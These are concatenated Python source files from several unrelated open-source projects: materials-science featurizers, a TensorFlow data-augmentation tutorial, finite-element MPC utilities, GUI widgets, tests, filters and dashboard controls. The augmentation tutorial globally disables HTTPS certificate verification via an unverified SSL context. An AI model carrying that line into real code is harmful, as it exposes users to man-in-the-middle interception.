self.crossover = crossover
self.adaptor = AseAtomsAdaptor()
self.length = None
self.atomic_numbers = None
self.soap = None
self.n_elements = None
@classmethod
def from_preset(cls, preset):
"""
Create a SOAP featurizer object from sensible or published presets.
Args:
preset (str): Choose from:
"formation energy": Preset used for formation energy prediction
in the original Dscribe paper.
        Returns:
            SOAP: a featurizer configured with the preset's parameters.
"""
valid_presets = ["formation_energy"]
if preset == "formation_energy":
return cls(6, 8, 8, 0.4, True, "gto", True)
else:
raise ValueError(f"'{preset}' is not a valid preset. Choose from {valid_presets}")
def _check_fitted(self):
if not self.soap:
raise NotFittedError("Please fit SOAP before featurizing.")
def fit(self, X, y=None):
"""
Fit the SOAP featurizer to a dataframe.
Args:
X ([SiteCollection]): For example, a list of pymatgen Structures.
y : unused (added for consistency with overridden method signature)
Returns:
self
"""
# Check that pymatgen.Structures are provided
if not all([isinstance(struct, Structure) for struct in X]):
raise TypeError("This fit requires an array-like input of Pymatgen " "Structures and sites!")
elements = set()
for s in X:
c = s.composition.elements
for e in c:
if e.Z not in elements:
elements.add(e.Z)
self.elements_sorted = sorted(list(elements))
self.atomic_numbers = elements
self.soap = SOAP_dscribe(
species=self.atomic_numbers,
rcut=self.rcut,
nmax=self.nmax,
lmax=self.lmax,
sigma=self.sigma,
rbf=self.rbf,
periodic=self.periodic,
crossover=self.crossover,
average="off",
sparse=False,
)
self.length = self.soap.get_number_of_features()
return self
def featurize(self, struct, idx):
self._check_fitted()
s_ase = self.adaptor.get_atoms(struct)
return self.soap.create(s_ase, positions=[idx], n_jobs=self.n_jobs).tolist()[0]
def feature_labels(self):
self._check_fitted()
return [f"SOAP_{i}" for i in range(self.length)]
def citations(self):
return [
"@article{PhysRevB.87.184115,"
"title = {On representing chemical environments},"
"author = {Bart'ok, <NAME>. and <NAME> and Cs'anyi, "
"G'abor},"
"journal = {Phys. Rev. B},"
"volume = {87},"
"issue = {18},"
"pages = {184115},"
"numpages = {16},"
"year = {2013},"
"month = {May},"
"publisher = {American Physical Society},"
"doi = {10.1103/PhysRevB.87.184115},"
"url = {https://link.aps.org/doi/10.1103/PhysRevB.87.184115}}",
"@Article{C6CP00415F,"
"author ={<NAME> Bartók, <NAME>. and Csányi, Gábor"
" and Ceriotti, Michele},"
"title ={Comparing molecules and solids across structural and "
"alchemical space},"
"journal = {Phys. Chem. Chem. Phys.},"
"year = {2016},"
"volume = {18},"
"issue = {20},"
"pages = {13754-13769},"
"publisher = {The Royal Society of Chemistry},"
"doi = {10.1039/C6CP00415F},"
"url = {http://dx.doi.org/10.1039/C6CP00415F},}",
"@article{dscribe, "
'author = {<NAME> and J{"a}ger, <NAME>. and '
"Morooka, <NAME>. and <NAME>, Filippo and Ranawat, "
"<NAME>. and Gao, <NAME>. and Rinke, Patrick and Foster, "
"<NAME>.}, "
"title = {{DScribe: Library of descriptors for machine "
"learning in materials science}}, "
"journal = {Computer Physics Communications}, "
"year = {2019}, pages = {106949}, "
"doi = {https://doi.org/10.1016/j.cpc.2019.106949}}",
]
def implementors(self):
return ["<NAME> and the DScribe team", "<NAME>"]
|
codes/python/basics_in_machine_learning/dataaugmentation.py
|
agnes-yang/TensorFlow-Course
| 7,040 |
116150
|
<filename>codes/python/basics_in_machine_learning/dataaugmentation.py
# -*- coding: utf-8 -*-
"""dataaugmentation.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ibfKtpxC_hIhZlPbefCoqpAS7jTdyiFw
"""
import tensorflow as tf
import tensorflow_datasets as tfds # Import TensorFlow datasets
import urllib
import matplotlib.pyplot as plt
import numpy as np
# Necessary for dealing with https urls
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
# We read only the first 10 training samples
ds, ds_info = tfds.load('colorectal_histology', split='train', shuffle_files=True, with_info=True, download=True)
assert isinstance(ds, tf.data.Dataset)
print(ds_info)
# Visualizing images
fig = tfds.show_examples(ds, ds_info)
# Reading all images (remove break point to read all)
for example in tfds.as_numpy(ds):
image, label = example['image'], example['label']
break
# take one sample from data
one_sample = ds.take(1)
one_sample = list(one_sample.as_numpy_iterator())
image = one_sample[0]['image']
label = one_sample[0]['label']
print(image.shape,label.shape)
# Side by side visualization
def visualize(im, imAgmented, operation):
fig = plt.figure()
plt.subplot(1,2,1)
plt.title('Original image')
plt.imshow(im)
plt.subplot(1,2,2)
plt.title(operation)
plt.imshow(imAgmented)
# Adding Gaussian noise to image
common_type = tf.float32 # Make noise and image of the same type
gnoise = tf.random.normal(shape=tf.shape(image), mean=0.0, stddev=0.1, dtype=common_type)
image_type_converted = tf.image.convert_image_dtype(image, dtype=common_type, saturate=False)
noisy_image = tf.add(image_type_converted, gnoise)
visualize(image_type_converted, noisy_image, 'noisy image')
# Adjusting brightness
bright = tf.image.adjust_brightness(image, 0.2)
visualize(image, bright, 'brightened image')
# Flip image
flipped = tf.image.flip_left_right(image)
visualize(image, flipped, 'flipped image')
adjusted = tf.image.adjust_jpeg_quality(image, jpeg_quality=20)
visualize(image, adjusted, 'quality adjusted image')
# Random cropping of the image (the cropping area is picked at random)
crop_to_original_ratio = 0.5 # The scale of the cropped area to the original image
new_size = int(crop_to_original_ratio * image.shape[0])
cropped = tf.image.random_crop(image, size=[new_size,new_size,3])
visualize(image, cropped, 'randomly cropped image')
# Center cropping of the image (the cropping area is at the center)
central_fraction = 0.6 # The scale of the cropped area to the original image
center_cropped = tf.image.central_crop(image, central_fraction=central_fraction)
visualize(image, center_cropped, 'centrally cropped image')
|
pyNastran/bdf/mesh_utils/mpc_dependency.py
|
ACea15/pyNastran
| 293 |
116176
|
"""
defines methods to access MPC/rigid element data:
- get_mpc_node_ids( mpc_id, stop_on_failure=True)
- get_mpc_node_ids_c1( mpc_id, stop_on_failure=True)
- get_rigid_elements_with_node_ids(self, node_ids)
- get_dependent_nid_to_components(self, mpc_id=None, stop_on_failure=True)
- get_lines_rigid(model: BDF)
 - get_mpcs(model, mpc_id, consider_mpcadd=True,
stop_on_failure=True)
"""
from __future__ import annotations
from collections import defaultdict
from typing import Tuple, List, Dict, Any, TYPE_CHECKING
import numpy as np
from pyNastran.utils.numpy_utils import integer_types
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
def get_mpc_node_ids(model: BDF, mpc_id: int,
consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> List[List[int]]:
r"""
Get the MPC/MPCADD IDs.
Parameters
----------
mpc_id : int
the MPC id
consider_mpcadd : bool
MPCADDs should not be considered when referenced from an MPCADD
from a case control, True should be used.
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
lines : List[[independent, dependent]]
independent : int
the independent node id
dependent : int
the dependent node id
I I
\ /
I---D---I
"""
lines = []
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
# dependent, independent
for card in mpcs:
if card.type == 'MPC':
nids = card.node_ids
nid0 = nids[0]
#component0 = card.components[0]
#enforced0 = card.coefficients[0]
#card.constraints[1:]
for nid, coefficient in zip(nids[1:], card.coefficients[1:]):
if coefficient != 0.0:
lines.append([nid0, nid])
else:
            msg = "get_MPCx_node_ids doesn't support %r" % card.type
if stop_on_failure:
raise RuntimeError(msg)
model.log.warning(msg)
return lines
def get_mpc_node_ids_c1(model: BDF, mpc_id: int,
consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> Tuple[Dict[str, List[int]],
Dict[str, List[int]]]:
r"""
Get the MPC/MPCADD IDs.
Parameters
----------
mpc_id : int
the MPC id
consider_mpcadd : bool
MPCADDs should not be considered when referenced from an MPCADD
from a case control, True should be used.
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
independent_node_ids_c1 : Dict[component] = node_ids
component : str
the DOF to constrain
node_ids : List[int]
the constrained node ids
dependent_node_ids_c1 : Dict[component] = node_ids
component : str
the DOF to constrain
node_ids : List[int]
the constrained node ids
I I
\ /
I---D---I
"""
if not isinstance(mpc_id, integer_types):
msg = 'mpc_id must be an integer; type=%s, mpc_id=\n%r' % (type(mpc_id), mpc_id)
raise TypeError(msg)
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
# dependent, independent
independent_node_ids_c1 = defaultdict(list)
dependent_node_ids_c1 = defaultdict(list)
for card in mpcs:
if card.type == 'MPC':
nids = card.node_ids
nid0 = nids[0]
#component0 = card.components[0]
#coefficient0 = card.coefficients[0]
#card.constraints[1:]
dofs = card.components
for dof in dofs:
independent_node_ids_c1[dof].append(nid0)
for nid, coefficient in zip(nids[1:], card.coefficients[1:]):
if coefficient != 0.0:
for dof in dofs:
dependent_node_ids_c1[dof].append(nid)
else:
            msg = "get_MPCx_node_ids_c1 doesn't support %r" % card.type
if stop_on_failure:
raise RuntimeError(msg)
model.log.warning(msg)
return dict(independent_node_ids_c1), dict(dependent_node_ids_c1)
def get_rigid_elements_with_node_ids(model: BDF, node_ids):
"""
Gets the series of rigid elements that use specific nodes
Parameters
----------
node_ids : List[int]
the node ids to check
Returns
-------
rbes : List[int]
the set of self.rigid_elements
"""
try:
nids = set(node_ids)
except TypeError:
print(node_ids)
raise
rbes = []
for eid, rigid_element in model.rigid_elements.items():
if rigid_element.type in ['RBE3', 'RBE2', 'RBE1', 'RBAR', 'RSPLINE', 'RROD', 'RBAR1']:
independent_nodes = set(rigid_element.independent_nodes)
dependent_nodes = set(rigid_element.dependent_nodes)
rbe_nids = independent_nodes | dependent_nodes
if nids.intersection(rbe_nids):
rbes.append(eid)
elif rigid_element.type == 'RSSCON':
msg = 'skipping card in get_rigid_elements_with_node_ids\n%s' % str(rigid_element)
model.log.warning(msg)
else:
raise RuntimeError(rigid_element.type)
return rbes
def get_dependent_nid_to_components(model: BDF, mpc_id=None, stop_on_failure=True):
"""
Gets a dictionary of the dependent node/components.
Parameters
----------
mpc_id : int; default=None -> no MPCs are checked
TODO: add
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
dependent_nid_to_components : dict[node_id] : components
node_id : int
the node_id
components : str
the DOFs that are linked
    Nastran can define a load/motion at a given node.
SPCs define constraints that may not have loads/motions.
MPCs and rigid elements define independent and dependent nodes on
specific DOFs.
- independent nodes : loads/motions may be defined
- dependent nodes : loads/motions may not be defined
"""
dependent_nid_to_components = {}
if mpc_id is not None:
mpcs = get_mpcs(model, mpc_id)
for mpc in mpcs:
if mpc.type == 'MPC':
for nid, component in zip(mpc.node_ids, mpc.components):
dependent_nid_to_components[nid] = component
else:
raise NotImplementedError(mpc)
for unused_eid, rigid_element in model.rigid_elements.items():
if rigid_element.type == 'RBE2':
dependent_nodes = set(rigid_element.dependent_nodes)
components = rigid_element.cm
for nid in dependent_nodes:
dependent_nid_to_components[nid] = components
elif rigid_element.type == 'RBE3':
dependent_nid_to_components[rigid_element.ref_grid_id] = rigid_element.refc
for gmi, cmi in zip(rigid_element.Gmi_node_ids, rigid_element.Cmi):
dependent_nid_to_components[gmi] = cmi
#if rigid_element.type in ['RBE3', 'RBE2', 'RBE1', 'RBAR']:
##independent_nodes = set(rigid_element.independent_nodes)
#dependent_nodes = set(rigid_element.dependent_nodes)
#rbe_nids = independent_nodes | dependent_nodes
#if nids.intersection(rbe_nids):
#rbes.append(eid)
#elif rigid_element == 'RSPLINE':
elif rigid_element.type == 'RBAR':
nodes = [rigid_element.ga, rigid_element.gb]
components = [rigid_element.cma, rigid_element.cmb]
for nid, componentsi in zip(nodes, components):
dependent_nid_to_components[nid] = componentsi
elif rigid_element.type == 'RBAR1':
for componentsi in rigid_element.cb:
dependent_nid_to_components[rigid_element.gb] = componentsi
elif rigid_element.type == 'RBE1':
# +------+-----+-----+-----+-------+-----+-----+-----+
# | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
# +======+=====+=====+=====+=======+=====+=====+=====+
# | RBE1 | EID | GN1 | CN1 | GN2 | CN2 | GN3 | CN3 |
# | | | GN4 | CN4 | GN5 | CN5 | GN6 | CN6 |
# | | UM | GM1 | CM1 | GM2 | CM2 | GM3 | CM3 |
# | | GM4 | CM4 | etc | ALPHA | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# | RBE1 | 59 | 59 | 123 | 60 | 456 | | |
# | | UM | 61 | 246 | | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# dependent=m (independent=n)
for nid, componentsi in zip(rigid_element.Gmi_node_ids, rigid_element.Cmi):
dependent_nid_to_components[nid] = componentsi
#dependent = elem.dependent_nodes
#independent = elem.independent_nodes
#assert len(dependent) == 1, dependent
#assert len(independent) == 1, independent
#lines_rigid.append([dependent[0], independent[0]])
elif rigid_element.type == 'RROD':
components = [rigid_element.cma, rigid_element.cmb]
if rigid_element.cma is not None:
nid = rigid_element.nodes[0]
for component in rigid_element.cma:
dependent_nid_to_components[nid] = component
if rigid_element.cmb is not None:
nid = rigid_element.nodes[1]
for component in rigid_element.cmb:
dependent_nid_to_components[nid] = component
elif rigid_element.type == 'RSPLINE':
#independent_nid = rigid_element.independent_nid
for nid, component in zip(rigid_element.dependent_nids, rigid_element.dependent_components):
if component is None:
continue
dependent_nid_to_components[nid] = component
elif rigid_element.type == 'RSSCON':
msg = 'skipping card in get_dependent_nid_to_components\n%s' % str(rigid_element)
model.log.warning(msg)
else:
raise RuntimeError(rigid_element.type)
return dependent_nid_to_components
def get_lines_rigid(model: BDF) -> Any:
"""
GUI helper function
dependent = (lines[:, 0])
independent = np.unique(lines[:, 1])
"""
lines_rigid = []
for eid, elem in model.rigid_elements.items():
if elem.type == 'RBE3':
if elem.Gmi != []:
# UM are dependent
msg = 'UM is not supported; RBE3 eid=%s Gmi=%s' % (elem.eid, elem.Gmi)
raise RuntimeError(msg)
#list_fields = ['RBE3', elem.eid, None, elem.ref_grid_id, elem.refc]
n1 = elem.ref_grid_id
assert isinstance(n1, integer_types), 'RBE3 eid=%s ref_grid_id=%s' % (elem.eid, n1)
for (_weight, ci, Gij) in zip(elem.weights, elem.comps, elem.Gijs):
Giji = elem._node_ids(nodes=Gij, allow_empty_nodes=True)
# list_fields += [wt, ci] + Giji
for n2 in Giji:
assert isinstance(n2, integer_types), 'RBE3 eid=%s Giji=%s' % (elem.eid, Giji)
lines_rigid.append([n1, n2])
elif elem.type == 'RBE2':
#list_fields = ['RBE2', elem.eid, elem.Gn(), elem.cm
#] + elem.Gmi_node_ids + [elem.alpha]
n2 = elem.Gn() # independent
nids1 = elem.Gmi_node_ids # dependent
for n1 in nids1:
lines_rigid.append([n1, n2])
elif elem.type in ['RBAR', 'RBAR1', 'RROD']: ## TODO: these aren't quite right
dependent = elem.Ga()
independent = elem.Gb()
lines_rigid.append([dependent, independent])
elif elem.type == 'RBE1':
# +------+-----+-----+-----+-------+-----+-----+-----+
# | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
# +======+=====+=====+=====+=======+=====+=====+=====+
# | RBE1 | EID | GN1 | CN1 | GN2 | CN2 | GN3 | CN3 |
# | | | GN4 | CN4 | GN5 | CN5 | GN6 | CN6 |
# | | UM | GM1 | CM1 | GM2 | CM2 | GM3 | CM3 |
# | | GM4 | CM4 | etc | ALPHA | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
# | RBE1 | 59 | 59 | 123 | 60 | 456 | | |
# | | UM | 61 | 246 | | | | |
# +------+-----+-----+-----+-------+-----+-----+-----+
dependent = elem.dependent_nodes
independent = elem.independent_nodes
#assert len(dependent) == 1, dependent
#assert len(independent) == 1, independent
if len(independent) != 1 or len(dependent) != 1:
msg = 'skipping card because len(independent) != 1 or len(dependent) != 1\n'
msg += ' independent = %s\n' % independent
msg += ' dependent = %s\n' % dependent
msg += str(elem)
model.log.error(msg)
continue
lines_rigid.append([dependent[0], independent[0]])
elif elem.type == 'RSPLINE':
independent_nid = elem.independent_nid
for dependent_nid in np.unique(elem.dependent_nids):
lines_rigid.append([dependent_nid, independent_nid])
elif elem.type == 'RSSCON':
model.log.warning('skipping card in _get_rigid\n%s' % str(elem))
else:
print(str(elem))
raise NotImplementedError(elem.type)
return lines_rigid
def get_mpcs(model, mpc_id: int, consider_mpcadd: bool=True,
stop_on_failure: bool=True) -> Tuple[List[int], List[str]]:
"""
Gets the MPCs in a semi-usable form.
Parameters
----------
mpc_id : int
the desired MPC ID
stop_on_failure : bool; default=True
errors if parsing something new
Returns
-------
nids : List[int]
the constrained nodes
comps : List[str]
the components that are constrained on each node
Considers:
- MPC
- MPCADD
"""
mpcs = model.get_reduced_mpcs(
mpc_id, consider_mpcadd=consider_mpcadd,
stop_on_failure=stop_on_failure)
nids = []
comps = []
for mpc in mpcs:
if mpc.type == 'MPC':
for nid, comp, unused_coefficient in zip(mpc.nodes, mpc.components, mpc.coefficients):
nids.append(nid)
comps.append(comp)
else:
if stop_on_failure:
model.log.error('not considering:\n%s' % str(mpc))
raise NotImplementedError(mpc)
model.log.warning('not considering:\n%s' % str(mpc))
return nids, comps
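# A minimal usage sketch (assumes an existing Nastran deck, here called
# "model.bdf", that defines MPC set 1; the filename is illustrative only):
#
#     from pyNastran.bdf.bdf import BDF
#     model = BDF()
#     model.read_bdf("model.bdf")
#     nids, comps = get_mpcs(model, mpc_id=1)
#     dependent = get_dependent_nid_to_components(model, mpc_id=1)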
|
python/GafferImageUI/ImageReaderPathPreview.py
|
ddesmond/gaffer
| 561 |
116193
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferImage
class ImageReaderPathPreview( GafferUI.PathPreviewWidget ) :
def __init__( self, path ) :
column = GafferUI.SplitContainer( GafferUI.SplitContainer.Orientation.Vertical )
GafferUI.PathPreviewWidget.__init__( self, column, path )
self.__script = Gaffer.ScriptNode( "imagePreview" )
self.__script["ImageReader"] = GafferImage.ImageReader()
with column :
self.__viewer = GafferUI.Viewer( self.__script )
GafferUI.Timeline( self.__script )
self._updateFromPath()
def isValid( self ) :
path = self.getPath()
if not isinstance( path, ( Gaffer.FileSystemPath, Gaffer.SequencePath ) ) or not path.isLeaf() :
return False
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
ext = sequence.fileName.split( "." )[-1]
except :
return False
else :
ext = str(path).split( "." )[-1]
return ext in GafferImage.ImageReader.supportedExtensions()
def _updateFromPath( self ) :
if not self.isValid() :
self.__script.selection().clear()
return
path = self.getPath()
if isinstance( path, Gaffer.SequencePath ) :
try :
sequence = IECore.FileSequence( str( path ) )
except :
return
fileName = sequence.fileName
frames = sequence.frameList.asList()
else :
fileName = str( path )
frames = None
self.__script["ImageReader"]["fileName"].setValue( fileName )
if frames :
self.__script.context().setFrame( frames[0] )
self.__script["frameRange"]["start"].setValue( frames[0] )
self.__script["frameRange"]["end"].setValue( frames[-1] )
GafferUI.Playback.acquire( self.__script.context() ).setFrameRange( frames[0], frames[-1] )
self.__script.selection().add( self.__script["ImageReader"] )
with self.__script.context() :
viewport = self.__viewer.viewGadgetWidget().getViewportGadget()
if viewport.getPrimaryChild() is not None :
viewport.frame( viewport.getPrimaryChild().bound() )
GafferUI.PathPreviewWidget.registerType( "Image", ImageReaderPathPreview )
|
__scraping__/transfermarkt.co.uk/main.py
|
whitmans-max/python-examples
| 140 |
116230
|
#!/usr/bin/env python3
# date: 2020.03.05
#
import requests
from bs4 import BeautifulSoup
url = "http://www.S/ederson/profil/spieler/238223"
response = requests.get(url, headers={'user-agent':"Mozilla/5.0"})
soup = BeautifulSoup(response.text, 'html.parser')
table = soup.find('table', {'class': 'auflistung'})
data = [x.text.strip().replace('\xa0', ' ') for x in table.find_all('td')]
print(data)
|
tests/components/nuheat/test_init.py
|
tbarbette/core
| 30,023 |
116233
|
<reponame>tbarbette/core<filename>tests/components/nuheat/test_init.py
"""NuHeat component tests."""
from unittest.mock import patch
from homeassistant.components.nuheat.const import DOMAIN
from .mocks import MOCK_CONFIG_ENTRY, _get_mock_nuheat
from tests.common import MockConfigEntry
VALID_CONFIG = {
"nuheat": {"username": "warm", "password": "<PASSWORD>", "devices": "thermostat123"}
}
INVALID_CONFIG = {"nuheat": {"username": "warm", "password": "<PASSWORD>"}}
async def test_init_success(hass):
"""Test that we can setup with valid config."""
mock_nuheat = _get_mock_nuheat()
with patch(
"homeassistant.components.nuheat.nuheat.NuHeat",
return_value=mock_nuheat,
):
config_entry = MockConfigEntry(domain=DOMAIN, data=MOCK_CONFIG_ENTRY)
config_entry.add_to_hass(hass)
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
|
payment/filter.py
|
wh8983298/GreaterWMS
| 1,063 |
116264
|
<filename>payment/filter.py
from django_filters import FilterSet
from .models import TransportationFeeListModel
class TransportationFeeListFilter(FilterSet):
class Meta:
model = TransportationFeeListModel
fields = {
"id": ['exact', 'iexact', 'gt', 'gte', 'lt', 'lte', 'isnull', 'in', 'range'],
"send_city": ['exact', 'iexact', 'contains', 'icontains'],
"receiver_city": ['exact', 'iexact', 'contains', 'icontains'],
"weight_fee": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"volume_fee": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"min_payment": ['exact', 'iexact', 'contains', 'icontains', 'gt', 'gte', 'lt', 'lte', 'range'],
"transportation_supplier": ['exact', 'iexact', 'contains', 'icontains'],
"creater": ['exact', 'iexact', 'contains', 'icontains'],
"is_delete": ['exact', 'iexact'],
"create_time": ['year', 'month', 'day', 'week_day', 'gt', 'gte', 'lt', 'lte', 'range'],
"update_time": ['year', 'month', 'day', 'week_day', 'gt', 'gte', 'lt', 'lte', 'range']
}
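# A usage sketch (hypothetical request): when this FilterSet is wired into a
# DRF view via django-filter, each declared lookup becomes a query parameter,
# e.g. GET /transportationfee/?send_city__icontains=shanghai&weight_fee__gte=10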
|
tests/syntax/def_list_as_arg_2.py
|
matan-h/friendly
| 287 |
116269
|
def test(x, [y]): # list as second argument, after comma
pass
|
scripts/build_config.py
|
Simon-Will/neuralmonkey
| 446 |
116278
|
<gh_stars>100-1000
#!/usr/bin/env python3
"""Loads and builds a given config file in memory.
Can be used for checking that a model can be loaded successfully, or for
generating a vocabulary from a dataset, without the need to run the model.
"""
import argparse
import collections
from typing import Any, Dict
import neuralmonkey
from neuralmonkey.config.parsing import parse_file
from neuralmonkey.config.builder import build_config, ObjectRef, ClassSymbol
def _patch_config_builder():
imports = set()
statements = []
def get_class_name(symbol: ClassSymbol):
name = symbol.clazz
if name.startswith("tf."):
return name
full_name = "neuralmonkey." + name
module, _, _ = full_name.rpartition(".")
imports.add("import " + module)
return full_name
def build_object(value: str,
all_dicts: Dict[str, Any],
existing_objects: Dict[str, Any],
depth: int) -> Any:
if depth > 20:
raise AssertionError(
"Config recursion should not be deeper that 20.")
if (isinstance(value, collections.Iterable) and
not isinstance(value, str)):
objects = [build_object(
val, all_dicts, existing_objects, depth + 1) for val in value]
if isinstance(value, tuple):
if len(objects) == 1:
objects[0] += "," # Singleton tuple needs a comma.
return "(" + ", ".join(objects) + ")"
else:
return "[" + ", ".join(objects) + "]"
if isinstance(value, ObjectRef):
if value.name not in existing_objects:
clazz = all_dicts[value.name]["class"]
args = [
"\n {}={}".format(key, build_object(
val, all_dicts, existing_objects, depth + 1))
for key, val in all_dicts[value.name].items()
if key != "class"
]
statements.append(
"{} = {}({})".format(
value.name, get_class_name(clazz), ",".join(args)))
existing_objects[value.name] = True
return value.expression
if isinstance(value, ClassSymbol):
return get_class_name(value)
return repr(value)
neuralmonkey.config.builder.build_object = build_object
return imports, statements
def main() -> None:
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("config", metavar="INI-FILE",
help="a configuration file")
parser.add_argument("--code", "-c", action="store_true",
help="instead of building the config, generate "
"equivalent Python code and write it to stdout")
args = parser.parse_args()
with open(args.config, "r", encoding="utf-8") as f:
_, config_dict = parse_file(f)
if args.code:
imports, statements = _patch_config_builder()
config, _ = build_config(config_dict, ignore_names=set())
if args.code:
print("import argparse\nimport tensorflow as tf")
print(*sorted(imports), sep="\n", end="\n\n")
print(*statements, sep="\n", end="\n\n")
print("model = argparse.Namespace({})".format(
",".join("\n {}={}".format(key, config[key]) for key in config)))
if __name__ == "__main__":
main()
|
Exec/radiation_tests/RadSuOlsonMG/python/read_gnu.py
|
MargotF/Castro
| 178 |
116286
|
#!/usr/bin/python
from numpy import *
def read_gnu_file(filenm):
x = []
y = []
f = open(filenm, 'r')
line = f.readline()
t = float(line.split('"')[1].split('=')[2])
for line in f.readlines():
if not line[0] == ";":
words = line.split()
x.append(float(words[0]))
y.append(float(words[1]))
f.close()
return array(y), array(x), t
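# Expected input sketch (inferred from the parser above; values are illustrative
# only): the first line carries a quoted label whose time follows the second
# '=', later lines hold "x y" pairs, and lines starting with ';' are skipped:
#     plot "u vs x, step = 10, t = 0.3"
#     0.00  1.2345
#     0.05  1.2291
#     ; trailing comment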
|
python/cuxfilter/charts/panel_widgets/panel_widgets.py
|
ajschmidt8/cuxfilter
| 201 |
116294
|
<reponame>ajschmidt8/cuxfilter
from ctypes import ArgumentError
from .plots import (
Card,
NumberChart,
RangeSlider,
DateRangeSlider,
IntSlider,
FloatSlider,
DropDown,
MultiSelect,
DataSizeIndicator,
)
from ..constants import CUDF_TIMEDELTA_TYPE
def range_slider(
x,
width=400,
height=20,
data_points=None,
step_size=None,
step_size_type=int,
**params,
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Range Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 20
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: int, default 1
step_size_type: {int, float}, default int
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = RangeSlider(
x, width, height, data_points, step_size, step_size_type, **params
)
plot.chart_type = "range_slider"
return plot
def date_range_slider(
x, width=400, height=20, data_points=None, **params,
):
"""
Widget in the navbar of the cuxfilter dashboard.
    Type: Date Range Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 20
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: np.timedelta64, default np.timedelta64(days=1)
**params:
additional arguments to be passed to the function. See bokeh
DateRangeSlider documentation for more info
"""
plot = DateRangeSlider(
x,
width,
height,
data_points,
step_size=None,
step_size_type=CUDF_TIMEDELTA_TYPE,
**params,
)
plot.chart_type = "date_range_slider"
return plot
def int_slider(
x, width=400, height=40, data_points=None, step_size=1, **params
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Int Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 40
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: int, default 1
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = IntSlider(
x, width, height, data_points, step_size, step_size_type=int, **params
)
plot.chart_type = "int_slider"
return plot
def float_slider(
x, width=400, height=40, data_points=None, step_size=None, **params
):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: Float Slider
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 40
data_points: int, default None
when None, it means no custom number of bins are provided and
data_points will default to df[self.x].nunique()
step_size: float, default float((max - min)/datapoints)
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = FloatSlider(
x,
width,
height,
data_points,
step_size,
step_size_type=float,
**params,
)
plot.chart_type = "float_slider"
return plot
def drop_down(x, width=400, height=50, **params):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: drop_down
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 50
data_points: int, default number of unique values
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = DropDown(x, width, height, **params)
plot.chart_type = "dropdown"
return plot
def multi_select(x, width=400, height=200, **params):
"""
Widget in the navbar of the cuxfilter dashboard.
Type: multi_select
Parameters
----------
x: str
column name from gpu dataframe
width: int, default 400
height: int, default 200
data_points: int, default number of unique values
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = MultiSelect(x, width, height, **params)
plot.chart_type = "multi_select"
return plot
def data_size_indicator(**library_specific_params):
"""
